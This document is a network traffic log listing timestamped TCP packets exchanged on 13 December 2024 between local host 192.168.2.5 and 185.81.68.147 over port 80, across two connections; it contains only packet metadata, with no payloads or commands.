Dec 13, 2024 01:37:21.357850075 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.359647036 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.359718084 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.359803915 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.361665964 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.361757994 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.361865044 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.363605976 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.363734007 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.363814116 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.365617990 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.365722895 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.365778923 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.367635965 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.367748022 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.367815018 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.369616032 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.369708061 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.369750977 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.371684074 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.371750116 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.371932983 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.373601913 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.373709917 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.373763084 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.375588894 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.375643969 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.375668049 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.423995018 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.495457888 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.543813944 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:21.544856071 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.548691034 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:21.668509960 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874183893 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874234915 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874361992 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874430895 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:22.874454975 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874473095 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874519110 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:22.874588966 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874638081 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874638081 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:22.874655962 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874671936 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874748945 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:22.874826908 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.874880075 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:22.994350910 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.994370937 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:22.994443893 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:22.998425961 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.051688910 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.067622900 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.067734003 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.067805052 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.071863890 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.072005987 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.072062969 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.080375910 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.080498934 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.080563068 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.088715076 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.088799000 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.088866949 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.097060919 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.097146034 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.097208023 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.105545044 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.105626106 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.105899096 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.113915920 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.114023924 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.114249945 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.122405052 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.122488022 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.124823093 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.130789995 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.130904913 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.131206036 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.139238119 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.139281034 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.140794039 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.171487093 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.171544075 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.172278881 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.187592030 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.187666893 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.188114882 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.259597063 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.259629011 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.259701014 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.261037111 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.261163950 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.261343002 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.266077995 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.266189098 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.266417980 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.271126032 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.271224976 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.271285057 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.276006937 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.276086092 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.276139975 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.280917883 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.281039953 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.281100988 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.285753965 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.285876036 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.285950899 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.290625095 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.290725946 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.290776014 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.295517921 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.295676947 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.295747042 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.300348043 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.300462008 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.300523043 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.305231094 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.305336952 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.305404902 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.310098886 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.310244083 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.310408115 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.315011024 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.315162897 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.315218925 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.319874048 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.319972992 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.320034027 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.323698997 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.323870897 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.323918104 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.327526093 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.327647924 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.327785969 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.331378937 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.331489086 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.331546068 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.335186005 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.335294008 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.335350037 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.339025021 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.339116096 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.340773106 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.342880011 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.342974901 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.343091011 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.346705914 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.346792936 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.346923113 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.350512981 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.350692987 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.350929022 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.379621983 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.379658937 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.379731894 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.452097893 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.452260971 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.452467918 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.453581095 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.453691006 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.454787970 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.456581116 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.456675053 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.456790924 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.459496975 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.459604979 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.460768938 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.462470055 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.462605000 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.462820053 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.465337992 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.465446949 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.465532064 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.468173981 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.468274117 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.468694925 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.471005917 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.471108913 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.471220970 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.473709106 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.473803997 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.474431992 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.476397038 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.476491928 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.476778030 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.478957891 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.479075909 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.479652882 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.481599092 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.481698990 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.481897116 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.484215021 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.484296083 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.484452009 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.486732960 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.486851931 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.486911058 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.489353895 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.489459038 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.489520073 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.491947889 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.492046118 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.492774963 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.494529963 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.494630098 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.494682074 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.497128963 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.497231960 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.499710083 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.499788046 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.499805927 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.500777960 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.502295971 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.502408981 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.502465010 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.504879951 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.505006075 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.506802082 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.506875038 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.506905079 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.508711100 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.508764029 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.508833885 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.510629892 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.510680914 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.510746956 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.512522936 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.512583017 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.512665033 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.512773037 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.514439106 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.514542103 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.514615059 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.516325951 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.516638041 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.516701937 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.518249035 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.518352032 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.520128012 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.520196915 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.520230055 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.520559072 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.522063971 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.522200108 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.522274971 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.523992062 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.524090052 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.524791956 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.525866985 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.526021957 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.526092052 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.527801037 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.527883053 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.527934074 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.529676914 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.529788017 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.529860020 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.531600952 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.531704903 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.533493042 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.533566952 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.533606052 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.534857988 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.535393953 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.535489082 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.535546064 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.537334919 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.537451982 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.537522078 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.539227962 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.539350986 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.539412022 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.644520998 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.644592047 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.644826889 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.645149946 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.645302057 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.645457029 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.646806002 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.647130966 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.647206068 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.648509026 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.648628950 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.648694992 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.650132895 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.650222063 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.651717901 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.651789904 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.651844978 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.652776003 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.653271914 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.653414011 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.653469086 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.654901028 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.655045033 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.655111074 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.656405926 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.656528950 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.656601906 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.657907963 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.658021927 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.659413099 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.659487963 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.659521103 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.660806894 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.660857916 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.660980940 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.661041021 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.662323952 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.662444115 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.662513971 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.663763046 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.663882971 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.663958073 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.665198088 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.665302992 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.665358067 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.666649103 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.666819096 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.668076992 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.668169022 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.668239117 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.669522047 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.669645071 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.669712067 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.670953989 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.671070099 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.671129942 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.672369003 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.672476053 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.672540903 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.673810005 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.673847914 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.675306082 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.675369024 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.675376892 CET	80	49726	185.81.68.147	192.168.2.5
